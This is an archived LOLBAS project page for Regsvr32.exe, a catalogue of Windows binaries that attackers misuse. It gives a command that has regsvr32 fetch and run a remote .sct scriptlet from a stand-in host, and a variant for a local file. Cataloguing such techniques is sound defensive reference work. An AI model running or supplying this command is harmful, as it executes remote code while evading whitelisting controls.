Skip to content
This repository has been archived by the owner on Dec 11, 2018. It is now read-only.

Latest commit

 

History

History
38 lines (24 loc) · 1007 Bytes

Regsvr32.md

File metadata and controls

38 lines (24 loc) · 1007 Bytes

UPDATE BOOKMARKS - PROJECT MOVED TO A DEDICATED PROJECT SITE. THIS SITE WILL NOT BE UPDATED ANYMORE, BUT WILL BE KEPT FOR HISTORICAL REASONS.

New site: https://github.com/LOLBAS-Project/LOLBAS Web portal: https://lolbas-project.github.io/

Regsvr32.exe

  • Functions: Execute
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll    
    
regsvr32.exe /s /u /i:file.sct scrobj.dll     

Acknowledgements:

  • Casey Smith - @subtee

Code sample:

Resources:

Full path:

C:\Windows\System32\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe

Notes: [1]Code sample linked to Red Canary - Atomic Red Team